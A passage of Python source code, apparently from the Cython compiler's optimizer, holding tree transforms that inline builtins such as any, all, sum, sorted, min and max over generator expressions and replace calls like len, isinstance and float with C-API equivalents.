step=step or ExprNodes.NoneNode(node.pos))
class YieldNodeCollector(Visitor.TreeVisitor):
def __init__(self):
Visitor.TreeVisitor.__init__(self)
self.yield_stat_nodes = {}
self.yield_nodes = []
visit_Node = Visitor.TreeVisitor.visitchildren
# XXX: disable inlining while it's not back supported
def __visit_YieldExprNode(self, node):
self.yield_nodes.append(node)
self.visitchildren(node)
def __visit_ExprStatNode(self, node):
self.visitchildren(node)
if node.expr in self.yield_nodes:
self.yield_stat_nodes[node.expr] = node
def __visit_GeneratorExpressionNode(self, node):
# enable when we support generic generator expressions
#
# everything below this node is out of scope
pass
def _find_single_yield_expression(self, node):
collector = self.YieldNodeCollector()
collector.visitchildren(node)
if len(collector.yield_nodes) != 1:
return None, None
yield_node = collector.yield_nodes[0]
try:
return (yield_node.arg, collector.yield_stat_nodes[yield_node])
except KeyError:
return None, None
def _handle_simple_function_all(self, node, pos_args):
"""Transform
_result = all(x for L in LL for x in L)
into
for L in LL:
for x in L:
if not x:
_result = False
break
else:
continue
break
else:
_result = True
"""
return self._transform_any_all(node, pos_args, False)
def _handle_simple_function_any(self, node, pos_args):
"""Transform
_result = any(x for L in LL for x in L)
into
for L in LL:
for x in L:
if x:
_result = True
break
else:
continue
break
else:
_result = False
"""
return self._transform_any_all(node, pos_args, True)
def _transform_any_all(self, node, pos_args, is_any):
if len(pos_args) != 1:
return node
if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
if is_any:
condition = yield_expression
else:
condition = ExprNodes.NotNode(yield_expression.pos, operand = yield_expression)
result_ref = UtilNodes.ResultRefNode(pos=node.pos, type=PyrexTypes.c_bint_type)
test_node = Nodes.IfStatNode(
yield_expression.pos,
else_clause = None,
if_clauses = [ Nodes.IfClauseNode(
yield_expression.pos,
condition = condition,
body = Nodes.StatListNode(
node.pos,
stats = [
Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = ExprNodes.BoolNode(yield_expression.pos, value = is_any,
constant_result = is_any)),
Nodes.BreakStatNode(node.pos)
])) ]
)
loop = loop_node
while isinstance(loop.body, Nodes.LoopNode):
next_loop = loop.body
loop.body = Nodes.StatListNode(loop.body.pos, stats = [
loop.body,
Nodes.BreakStatNode(yield_expression.pos)
])
next_loop.else_clause = Nodes.ContinueStatNode(yield_expression.pos)
loop = next_loop
loop_node.else_clause = Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = ExprNodes.BoolNode(yield_expression.pos, value = not is_any,
constant_result = not is_any))
Visitor.recursively_replace_node(loop_node, yield_stat_node, test_node)
return ExprNodes.InlinedGeneratorExpressionNode(
gen_expr_node.pos, loop = loop_node, result_node = result_ref,
expr_scope = gen_expr_node.expr_scope, orig_func = is_any and 'any' or 'all')
PySequence_List_func_type = PyrexTypes.CFuncType(
Builtin.list_type,
[PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)])
def _handle_simple_function_sorted(self, node, pos_args):
"""Transform sorted(genexpr) and sorted([listcomp]) into
[listcomp].sort(). CPython just reads the iterable into a
list and calls .sort() on it. Expanding the iterable in a
listcomp is still faster and the result can be sorted in
place.
"""
if len(pos_args) != 1:
return node
if isinstance(pos_args[0], ExprNodes.ComprehensionNode) \
and pos_args[0].type is Builtin.list_type:
listcomp_node = pos_args[0]
loop_node = listcomp_node.loop
elif isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
append_node = ExprNodes.ComprehensionAppendNode(
yield_expression.pos, expr = yield_expression)
Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)
listcomp_node = ExprNodes.ComprehensionNode(
gen_expr_node.pos, loop = loop_node,
append = append_node, type = Builtin.list_type,
expr_scope = gen_expr_node.expr_scope,
has_local_scope = True)
append_node.target = listcomp_node
elif isinstance(pos_args[0], (ExprNodes.ListNode, ExprNodes.TupleNode)):
# sorted([a, b, c]) or sorted((a, b, c)). The result of the latter
# is a list in CPython, so change it into one.
expr = pos_args[0].as_list()
listcomp_node = loop_node = expr
else:
# Interestingly, PySequence_List works on a lot of non-sequence
# things as well.
listcomp_node = loop_node = ExprNodes.PythonCapiCallNode(
node.pos, "PySequence_List", self.PySequence_List_func_type,
args=pos_args, is_temp=True)
result_node = UtilNodes.ResultRefNode(
pos = loop_node.pos, type = Builtin.list_type, may_hold_none=False)
listcomp_assign_node = Nodes.SingleAssignmentNode(
node.pos, lhs = result_node, rhs = listcomp_node, first = True)
sort_method = ExprNodes.AttributeNode(
node.pos, obj = result_node, attribute = EncodedString('sort'),
# entry ? type ?
needs_none_check = False)
sort_node = Nodes.ExprStatNode(
node.pos, expr = ExprNodes.SimpleCallNode(
node.pos, function = sort_method, args = []))
sort_node.analyse_declarations(self.current_env())
return UtilNodes.TempResultFromStatNode(
result_node,
Nodes.StatListNode(node.pos, stats = [ listcomp_assign_node, sort_node ]))
def _handle_simple_function_sum(self, node, pos_args):
"""Transform sum(genexpr) into an equivalent inlined aggregation loop.
"""
if len(pos_args) not in (1,2):
return node
if not isinstance(pos_args[0], (ExprNodes.GeneratorExpressionNode,
ExprNodes.ComprehensionNode)):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
if isinstance(gen_expr_node, ExprNodes.GeneratorExpressionNode):
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
else: # ComprehensionNode
yield_stat_node = gen_expr_node.append
yield_expression = yield_stat_node.expr
try:
if not yield_expression.is_literal or not yield_expression.type.is_int:
return node
except AttributeError:
return node # in case we don't have a type yet
# special case: old Py2 backwards compatible "sum([int_const for ...])"
# can safely be unpacked into a genexpr
if len(pos_args) == 1:
start = ExprNodes.IntNode(node.pos, value='0', constant_result=0)
else:
start = pos_args[1]
result_ref = UtilNodes.ResultRefNode(pos=node.pos, type=PyrexTypes.py_object_type)
add_node = Nodes.SingleAssignmentNode(
yield_expression.pos,
lhs = result_ref,
rhs = ExprNodes.binop_node(node.pos, '+', result_ref, yield_expression)
)
Visitor.recursively_replace_node(loop_node, yield_stat_node, add_node)
exec_code = Nodes.StatListNode(
node.pos,
stats = [
Nodes.SingleAssignmentNode(
start.pos,
lhs = UtilNodes.ResultRefNode(pos=node.pos, expression=result_ref),
rhs = start,
first = True),
loop_node
])
return ExprNodes.InlinedGeneratorExpressionNode(
gen_expr_node.pos, loop = exec_code, result_node = result_ref,
expr_scope = gen_expr_node.expr_scope, orig_func = 'sum',
has_local_scope = gen_expr_node.has_local_scope)
def _handle_simple_function_min(self, node, pos_args):
return self._optimise_min_max(node, pos_args, '<')
def _handle_simple_function_max(self, node, pos_args):
return self._optimise_min_max(node, pos_args, '>')
def _optimise_min_max(self, node, args, operator):
"""Replace min(a,b,...) and max(a,b,...) by explicit comparison code.
"""
if len(args) <= 1:
if len(args) == 1 and args[0].is_sequence_constructor:
args = args[0].args
else:
# leave this to Python
return node
cascaded_nodes = list(map(UtilNodes.ResultRefNode, args[1:]))
last_result = args[0]
for arg_node in cascaded_nodes:
result_ref = UtilNodes.ResultRefNode(last_result)
last_result = ExprNodes.CondExprNode(
arg_node.pos,
true_val = arg_node,
false_val = result_ref,
test = ExprNodes.PrimaryCmpNode(
arg_node.pos,
operand1 = arg_node,
operator = operator,
operand2 = result_ref,
)
)
last_result = UtilNodes.EvalWithTempExprNode(result_ref, last_result)
for ref_node in cascaded_nodes[::-1]:
last_result = UtilNodes.EvalWithTempExprNode(ref_node, last_result)
return last_result
def _DISABLED_handle_simple_function_tuple(self, node, pos_args):
if not pos_args:
return ExprNodes.TupleNode(node.pos, args=[], constant_result=())
# This is a bit special - for iterables (including genexps),
# Python actually overallocates and resizes a newly created
# tuple incrementally while reading items, which we can't
# easily do without explicit node support. Instead, we read
# the items into a list and then copy them into a tuple of the
# final size. This takes up to twice as much memory, but will
# have to do until we have real support for genexps.
result = self._transform_list_set_genexpr(node, pos_args, Builtin.list_type)
if result is not node:
return ExprNodes.AsTupleNode(node.pos, arg=result)
return node
def _handle_simple_function_frozenset(self, node, pos_args):
"""Replace frozenset([...]) by frozenset((...)) as tuples are more efficient.
"""
if len(pos_args) != 1:
return node
if pos_args[0].is_sequence_constructor and not pos_args[0].args:
del pos_args[0]
elif isinstance(pos_args[0], ExprNodes.ListNode):
pos_args[0] = pos_args[0].as_tuple()
return node
def _handle_simple_function_list(self, node, pos_args):
if not pos_args:
return ExprNodes.ListNode(node.pos, args=[], constant_result=[])
return self._transform_list_set_genexpr(node, pos_args, Builtin.list_type)
def _handle_simple_function_set(self, node, pos_args):
if not pos_args:
return ExprNodes.SetNode(node.pos, args=[], constant_result=set())
return self._transform_list_set_genexpr(node, pos_args, Builtin.set_type)
def _transform_list_set_genexpr(self, node, pos_args, target_type):
"""Replace set(genexpr) and list(genexpr) by a literal comprehension.
"""
if len(pos_args) > 1:
return node
if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
append_node = ExprNodes.ComprehensionAppendNode(
yield_expression.pos,
expr = yield_expression)
Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)
comp = ExprNodes.ComprehensionNode(
node.pos,
has_local_scope = True,
expr_scope = gen_expr_node.expr_scope,
loop = loop_node,
append = append_node,
type = target_type)
append_node.target = comp
return comp
def _handle_simple_function_dict(self, node, pos_args):
"""Replace dict( (a,b) for ... ) by a literal { a:b for ... }.
"""
if len(pos_args) == 0:
return ExprNodes.DictNode(node.pos, key_value_pairs=[], constant_result={})
if len(pos_args) > 1:
return node
if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
if not isinstance(yield_expression, ExprNodes.TupleNode):
return node
if len(yield_expression.args) != 2:
return node
append_node = ExprNodes.DictComprehensionAppendNode(
yield_expression.pos,
key_expr = yield_expression.args[0],
value_expr = yield_expression.args[1])
Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)
dictcomp = ExprNodes.ComprehensionNode(
node.pos,
has_local_scope = True,
expr_scope = gen_expr_node.expr_scope,
loop = loop_node,
append = append_node,
type = Builtin.dict_type)
append_node.target = dictcomp
return dictcomp
# specific handlers for general call nodes
def _handle_general_function_dict(self, node, pos_args, kwargs):
"""Replace dict(a=b,c=d,...) by the underlying keyword dict
construction which is done anyway.
"""
if len(pos_args) > 0:
return node
if not isinstance(kwargs, ExprNodes.DictNode):
return node
return kwargs
class InlineDefNodeCalls(Visitor.NodeRefCleanupMixin, Visitor.EnvTransform):
visit_Node = Visitor.VisitorTransform.recurse_to_children
def get_constant_value_node(self, name_node):
if name_node.cf_state is None:
return None
if name_node.cf_state.cf_is_null:
return None
entry = self.current_env().lookup(name_node.name)
if not entry or (not entry.cf_assignments
or len(entry.cf_assignments) != 1):
# not just a single assignment in all closures
return None
return entry.cf_assignments[0].rhs
def visit_SimpleCallNode(self, node):
self.visitchildren(node)
if not self.current_directives.get('optimize.inline_defnode_calls'):
return node
function_name = node.function
if not function_name.is_name:
return node
function = self.get_constant_value_node(function_name)
if not isinstance(function, ExprNodes.PyCFunctionNode):
return node
inlined = ExprNodes.InlinedDefNodeCallNode(
node.pos, function_name=function_name,
function=function, args=node.args)
if inlined.can_be_inlined():
return self.replace(node, inlined)
return node
class OptimizeBuiltinCalls(Visitor.NodeRefCleanupMixin,
Visitor.MethodDispatcherTransform):
"""Optimize some common methods calls and instantiation patterns
for builtin types *after* the type analysis phase.
Running after type analysis, this transform can only perform
function replacements that do not alter the function return type
in a way that was not anticipated by the type analysis.
"""
### cleanup to avoid redundant coercions to/from Python types
def _visit_PyTypeTestNode(self, node):
# disabled - appears to break assignments in some cases, and
# also drops a None check, which might still be required
"""Flatten redundant type checks after tree changes.
"""
old_arg = node.arg
self.visitchildren(node)
if old_arg is node.arg or node.arg.type != node.type:
return node
return node.arg
def _visit_TypecastNode(self, node):
# disabled - the user may have had a reason to put a type
# cast, even if it looks redundant to Cython
"""
Drop redundant type casts.
"""
self.visitchildren(node)
if node.type == node.operand.type:
return node.operand
return node
def visit_ExprStatNode(self, node):
"""
Drop useless coercions.
"""
self.visitchildren(node)
if isinstance(node.expr, ExprNodes.CoerceToPyTypeNode):
node.expr = node.expr.arg
return node
def visit_CoerceToBooleanNode(self, node):
"""Drop redundant conversion nodes after tree changes.
"""
self.visitchildren(node)
arg = node.arg
if isinstance(arg, ExprNodes.PyTypeTestNode):
arg = arg.arg
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.type in (PyrexTypes.py_object_type, Builtin.bool_type):
return arg.arg.coerce_to_boolean(self.current_env())
return node
def visit_CoerceFromPyTypeNode(self, node):
"""Drop redundant conversion nodes after tree changes.
Also, optimise away calls to Python's builtin int() and
float() if the result is going to be coerced back into a C
type anyway.
"""
self.visitchildren(node)
arg = node.arg
if not arg.type.is_pyobject:
# no Python conversion left at all, just do a C coercion instead
if node.type == arg.type:
return arg
else:
return arg.coerce_to(node.type, self.current_env())
if isinstance(arg, ExprNodes.PyTypeTestNode):
arg = arg.arg
if arg.is_literal:
if (node.type.is_int and isinstance(arg, ExprNodes.IntNode) or
node.type.is_float and isinstance(arg, ExprNodes.FloatNode) or
node.type.is_int and isinstance(arg, ExprNodes.BoolNode)):
return arg.coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.type is PyrexTypes.py_object_type:
if node.type.assignable_from(arg.arg.type):
# completely redundant C->Py->C coercion
return arg.arg.coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.SimpleCallNode):
if node.type.is_int or node.type.is_float:
return self._optimise_numeric_cast_call(node, arg)
elif isinstance(arg, ExprNodes.IndexNode) and not arg.is_buffer_access:
index_node = arg.index
if isinstance(index_node, ExprNodes.CoerceToPyTypeNode):
index_node = index_node.arg
if index_node.type.is_int:
return self._optimise_int_indexing(node, arg, index_node)
return node
PyBytes_GetItemInt_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_char_type, [
PyrexTypes.CFuncTypeArg("bytes", Builtin.bytes_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("check_bounds", PyrexTypes.c_int_type, None),
],
exception_value = "((char)-1)",
exception_check = True)
def _optimise_int_indexing(self, coerce_node, arg, index_node):
env = self.current_env()
bound_check_bool = env.directives['boundscheck'] and 1 or 0
if arg.base.type is Builtin.bytes_type:
if coerce_node.type in (PyrexTypes.c_char_type, PyrexTypes.c_uchar_type):
# bytes[index] -> char
bound_check_node = ExprNodes.IntNode(
coerce_node.pos, value=str(bound_check_bool),
constant_result=bound_check_bool)
node = ExprNodes.PythonCapiCallNode(
coerce_node.pos, "__Pyx_PyBytes_GetItemInt",
self.PyBytes_GetItemInt_func_type,
args=[
arg.base.as_none_safe_node("'NoneType' object is not subscriptable"),
index_node.coerce_to(PyrexTypes.c_py_ssize_t_type, env),
bound_check_node,
],
is_temp=True,
utility_code=UtilityCode.load_cached(
'bytes_index', 'StringTools.c'))
if coerce_node.type is not PyrexTypes.c_char_type:
node = node.coerce_to(coerce_node.type, env)
return node
return coerce_node
def _optimise_numeric_cast_call(self, node, arg):
function = arg.function
if not isinstance(function, ExprNodes.NameNode) \
or not function.type.is_builtin_type \
or not isinstance(arg.arg_tuple, ExprNodes.TupleNode):
return node
args = arg.arg_tuple.args
if len(args) != 1:
return node
func_arg = args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
func_arg = func_arg.arg
elif func_arg.type.is_pyobject:
# play safe: Python conversion might work on all sorts of things
return node
if function.name == 'int':
if func_arg.type.is_int or node.type.is_int:
if func_arg.type == node.type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_float:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
elif function.name == 'float':
if func_arg.type.is_float or node.type.is_float:
if func_arg.type == node.type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_float:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
return node
def _error_wrong_arg_count(self, function_name, node, args, expected=None):
if not expected: # None or 0
arg_str = ''
elif isinstance(expected, basestring) or expected > 1:
arg_str = '...'
elif expected == 1:
arg_str = 'x'
else:
arg_str = ''
if expected is not None:
expected_str = 'expected %s, ' % expected
else:
expected_str = ''
error(node.pos, "%s(%s) called with wrong number of args, %sfound %d" % (
function_name, arg_str, expected_str, len(args)))
### generic fallbacks
def _handle_function(self, node, function_name, function, arg_list, kwargs):
return node
def _handle_method(self, node, type_name, attr_name, function,
arg_list, is_unbound_method, kwargs):
"""
Try to inject C-API calls for unbound method calls to builtin types.
While the method declarations in Builtin.py already handle this, we
can additionally resolve bound and unbound methods here that were
assigned to variables ahead of time.
"""
if kwargs:
return node
if not function or not function.is_attribute or not function.obj.is_name:
# cannot track unbound method calls over more than one indirection as
# the names might have been reassigned in the meantime
return node
type_entry = self.current_env().lookup(type_name)
if not type_entry:
return node
method = ExprNodes.AttributeNode(
node.function.pos,
obj=ExprNodes.NameNode(
function.pos,
name=type_name,
entry=type_entry,
type=type_entry.type),
attribute=attr_name,
is_called=True).analyse_as_unbound_cmethod_node(self.current_env())
if method is None:
return node
args = node.args
if args is None and node.arg_tuple:
args = node.arg_tuple.args
call_node = ExprNodes.SimpleCallNode(
node.pos,
function=method,
args=args)
if not is_unbound_method:
call_node.self = function.obj
call_node.analyse_c_function_call(self.current_env())
call_node.analysed = True
return call_node.coerce_to(node.type, self.current_env())
### builtin types
PyDict_Copy_func_type = PyrexTypes.CFuncType(
Builtin.dict_type, [
PyrexTypes.CFuncTypeArg("dict", Builtin.dict_type, None)
])
def _handle_simple_function_dict(self, node, function, pos_args):
"""Replace dict(some_dict) by PyDict_Copy(some_dict).
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
if arg.type is Builtin.dict_type:
arg = arg.as_none_safe_node("'NoneType' is not iterable")
return ExprNodes.PythonCapiCallNode(
node.pos, "PyDict_Copy", self.PyDict_Copy_func_type,
args = [arg],
is_temp = node.is_temp
)
return node
PySequence_List_func_type = PyrexTypes.CFuncType(
Builtin.list_type,
[PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)])
def _handle_simple_function_list(self, node, function, pos_args):
"""Turn list(ob) into PySequence_List(ob).
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
return ExprNodes.PythonCapiCallNode(
node.pos, "PySequence_List", self.PySequence_List_func_type,
args=pos_args, is_temp=node.is_temp)
PyList_AsTuple_func_type = PyrexTypes.CFuncType(
Builtin.tuple_type, [
PyrexTypes.CFuncTypeArg("list", Builtin.list_type, None)
])
PySequence_Tuple_func_type = PyrexTypes.CFuncType(
Builtin.tuple_type,
[PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)])
def _handle_simple_function_tuple(self, node, function, pos_args):
"""Replace tuple([...]) by PyList_AsTuple or PySequence_Tuple.
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
if arg.type is Builtin.tuple_type and not arg.may_be_none():
return arg
if arg.type is Builtin.list_type:
pos_args[0] = arg.as_none_safe_node(
"'NoneType' object is not iterable")
return ExprNodes.PythonCapiCallNode(
node.pos, "PyList_AsTuple", self.PyList_AsTuple_func_type,
args=pos_args, is_temp=node.is_temp)
else:
return ExprNodes.PythonCapiCallNode(
node.pos, "PySequence_Tuple", self.PySequence_Tuple_func_type,
args=pos_args, is_temp=node.is_temp)
PySet_New_func_type = PyrexTypes.CFuncType(
Builtin.set_type, [
PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_set(self, node, function, pos_args):
if len(pos_args) != 1:
return node
if pos_args[0].is_sequence_constructor:
# We can optimise set([x,y,z]) safely into a set literal,
# but only if we create all items before adding them -
# adding an item may raise an exception if it is not
# hashable, but creating the later items may have
# side-effects.
args = []
temps = []
for arg in pos_args[0].args:
if not arg.is_simple():
arg = UtilNodes.LetRefNode(arg)
temps.append(arg)
args.append(arg)
result = ExprNodes.SetNode(node.pos, is_temp=1, args=args)
self.replace(node, result)
for temp in temps[::-1]:
result = UtilNodes.EvalWithTempExprNode(temp, result)
return result
else:
# PySet_New(it) is better than a generic Python call to set(it)
return self.replace(node, ExprNodes.PythonCapiCallNode(
node.pos, "PySet_New",
self.PySet_New_func_type,
args=pos_args,
is_temp=node.is_temp,
py_name="set"))
PyFrozenSet_New_func_type = PyrexTypes.CFuncType(
Builtin.frozenset_type, [
PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_frozenset(self, node, function, pos_args):
if not pos_args:
pos_args = [ExprNodes.NullNode(node.pos)]
elif len(pos_args) > 1:
return node
elif pos_args[0].type is Builtin.frozenset_type and not pos_args[0].may_be_none():
return pos_args[0]
# PyFrozenSet_New(it) is better than a generic Python call to frozenset(it)
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyFrozenSet_New",
self.PyFrozenSet_New_func_type,
args=pos_args,
is_temp=node.is_temp,
utility_code=UtilityCode.load_cached('pyfrozenset_new', 'Builtins.c'),
py_name="frozenset")
PyObject_AsDouble_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_double_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None),
],
exception_value = "((double)-1)",
exception_check = True)
def _handle_simple_function_float(self, node, function, pos_args):
"""Transform float() into either a C type cast or a faster C
function call.
"""
# Note: this requires the float() function to be typed as
# returning a C 'double'
if len(pos_args) == 0:
return ExprNodes.FloatNode(
node, value="0.0", constant_result=0.0
).coerce_to(Builtin.float_type, self.current_env())
elif len(pos_args) != 1:
self._error_wrong_arg_count('float', node, pos_args, '0 or 1')
return node
func_arg = pos_args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
func_arg = func_arg.arg
if func_arg.type is PyrexTypes.c_double_type:
return func_arg
elif node.type.assignable_from(func_arg.type) or func_arg.type.is_numeric:
return ExprNodes.TypecastNode(
node.pos, operand=func_arg, type=node.type)
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyObject_AsDouble",
self.PyObject_AsDouble_func_type,
args = pos_args,
is_temp = node.is_temp,
utility_code = load_c_utility('pyobject_as_double'),
py_name = "float")
PyNumber_Int_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("o", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_int(self, node, function, pos_args):
"""Transform int() into a faster C function call.
"""
if len(pos_args) == 0:
return ExprNodes.IntNode(node.pos, value="0", constant_result=0,
type=PyrexTypes.py_object_type)
elif len(pos_args) != 1:
return node # int(x, base)
func_arg = pos_args[0]
if isinstance(func_arg, ExprNodes.CoerceToPyTypeNode):
return node # handled in visit_CoerceFromPyTypeNode()
if func_arg.type.is_pyobject and node.type.is_pyobject:
return ExprNodes.PythonCapiCallNode(
node.pos, "PyNumber_Int", self.PyNumber_Int_func_type,
args=pos_args, is_temp=True)
return node
def _handle_simple_function_bool(self, node, function, pos_args):
"""Transform bool(x) into a type coercion to a boolean.
"""
if len(pos_args) == 0:
return ExprNodes.BoolNode(
node.pos, value=False, constant_result=False
).coerce_to(Builtin.bool_type, self.current_env())
elif len(pos_args) != 1:
self._error_wrong_arg_count('bool', node, pos_args, '0 or 1')
return node
else:
# => !!<bint>(x) to make sure it's exactly 0 or 1
operand = pos_args[0].coerce_to_boolean(self.current_env())
operand = ExprNodes.NotNode(node.pos, operand = operand)
operand = ExprNodes.NotNode(node.pos, operand = operand)
# coerce back to Python object as that's the result we are expecting
return operand.coerce_to_pyobject(self.current_env())
### builtin functions
Pyx_strlen_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_size_t_type, [
PyrexTypes.CFuncTypeArg("bytes", PyrexTypes.c_char_ptr_type, None)
])
Pyx_Py_UNICODE_strlen_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_size_t_type, [
PyrexTypes.CFuncTypeArg("unicode", PyrexTypes.c_py_unicode_ptr_type, None)
])
PyObject_Size_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None)
],
exception_value="-1")
_map_to_capi_len_function = {
Builtin.unicode_type : "__Pyx_PyUnicode_GET_LENGTH",
Builtin.bytes_type : "PyBytes_GET_SIZE",
Builtin.list_type : "PyList_GET_SIZE",
Builtin.tuple_type : "PyTuple_GET_SIZE",
Builtin.dict_type : "PyDict_Size",
Builtin.set_type : "PySet_Size",
Builtin.frozenset_type : "__Pyx_PyFrozenSet_Size",
}.get
_ext_types_with_pysize = set(["cpython.array.array"])
def _handle_simple_function_len(self, node, function, pos_args):
"""Replace len(char*) by the equivalent call to strlen(),
len(Py_UNICODE) by the equivalent Py_UNICODE_strlen() and
len(known_builtin_type) by an equivalent C-API call.
"""
if len(pos_args) != 1:
self._error_wrong_arg_count('len', node, pos_args, 1)
return node
arg = pos_args[0]
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
arg = arg.arg
if arg.type.is_string:
new_node = ExprNodes.PythonCapiCallNode(
node.pos, "strlen", self.Pyx_strlen_func_type,
args = [arg],
is_temp = node.is_temp,
utility_code = UtilityCode.load_cached("IncludeStringH", "StringTools.c"))
elif arg.type.is_pyunicode_ptr:
new_node = ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_Py_UNICODE_strlen", self.Pyx_Py_UNICODE_strlen_func_type,
args = [arg],
is_temp = node.is_temp)
elif arg.type.is_pyobject:
cfunc_name = self._map_to_capi_len_function(arg.type)
if cfunc_name is None:
arg_type = arg.type
if ((arg_type.is_extension_type or arg_type.is_builtin_type)
and arg_type.entry.qualified_name in self._ext_types_with_pysize):
cfunc_name = 'Py_SIZE'
else:
return node
arg = arg.as_none_safe_node(
"object of type 'NoneType' has no len()")
new_node = ExprNodes.PythonCapiCallNode(
node.pos, cfunc_name, self.PyObject_Size_func_type,
args = [arg],
is_temp = node.is_temp)
elif arg.type.is_unicode_char:
return ExprNodes.IntNode(node.pos, value='1', constant_result=1,
type=node.type)
else:
return node
if node.type not in (PyrexTypes.c_size_t_type, PyrexTypes.c_py_ssize_t_type):
new_node = new_node.coerce_to(node.type, self.current_env())
return new_node
Pyx_Type_func_type = PyrexTypes.CFuncType(
Builtin.type_type, [
PyrexTypes.CFuncTypeArg("object", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_type(self, node, function, pos_args):
"""Replace type(o) by a macro call to Py_TYPE(o).
"""
if len(pos_args) != 1:
return node
node = ExprNodes.PythonCapiCallNode(
node.pos, "Py_TYPE", self.Pyx_Type_func_type,
args = pos_args,
is_temp = False)
return ExprNodes.CastNode(node, PyrexTypes.py_object_type)
Py_type_check_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("arg", PyrexTypes.py_object_type, None)
])
def _handle_simple_function_isinstance(self, node, function, pos_args):
"""Replace isinstance() checks against builtin types by the
corresponding C-API call.
"""
if len(pos_args) != 2:
return node
arg, types = pos_args
temps = []
if isinstance(types, ExprNodes.TupleNode):
types = types.args
if len(types) == 1 and not types[0].type is Builtin.type_type:
return node # nothing to improve here
if arg.is_attribute or not arg.is_simple():
arg = UtilNodes.ResultRefNode(arg)
temps.append(arg)
elif types.type is Builtin.type_type:
types = [types]
else:
return node
tests = []
test_nodes = []
env = self.current_env()
for test_type_node in types:
builtin_type = None
if test_type_node.is_name:
if test_type_node.entry:
entry = env.lookup(test_type_node.entry.name)
if entry and entry.type and entry.type.is_builtin_type:
builtin_type = entry.type
if builtin_type is Builtin.type_type:
# all types have type "type", but there's only one 'type'
if entry.name != 'type' or not (
entry.scope and entry.scope.is_builtin_scope):
builtin_type = None
if builtin_type is not None:
type_check_function = entry.type.type_check_function(exact=False)
if type_check_function in tests:
continue
tests.append(type_check_function)
type_check_args = [arg]
elif test_type_node.type is Builtin.type_type:
type_check_function = '__Pyx_TypeCheck'
type_check_args = [arg, test_type_node]
else:
if not test_type_node.is_literal:
test_type_node = UtilNodes.ResultRefNode(test_type_node)
temps.append(test_type_node)
type_check_function = 'PyObject_IsInstance'
type_check_args = [arg, test_type_node]
test_nodes.append(
ExprNodes.PythonCapiCallNode(
test_type_node.pos, type_check_function, self.Py_type_check_func_type,
args=type_check_args,
is_temp=True,
))
def join_with_or(a, b, make_binop_node=ExprNodes.binop_node):
or_node = make_binop_node(node.pos, 'or', a, b)
or_node.type = PyrexTypes.c_bint_type
or_node.wrap_operands(env)
return or_node
test_node = reduce(join_with_or, test_nodes).coerce_to(node.type, env)
for temp in temps[::-1]:
test_node = UtilNodes.EvalWithTempExprNode(temp, test_node)
return test_node
def _handle_simple_function_ord(self, node, function, pos_args):
"""Unpack ord(Py_UNICODE) and ord('X').
"""
if len(pos_args) != 1:
return node
arg = pos_args[0]
if isinstance(arg, ExprNodes.CoerceToPyTypeNode):
if arg.arg.type.is_unicode_char:
return ExprNodes.TypecastNode(
arg.pos, operand=arg.arg, type=PyrexTypes.c_int_type
).coerce_to(node.type, self.current_env())
elif isinstance(arg, ExprNodes.UnicodeNode):
if len(arg.value) == 1:
return ExprNodes.IntNode(
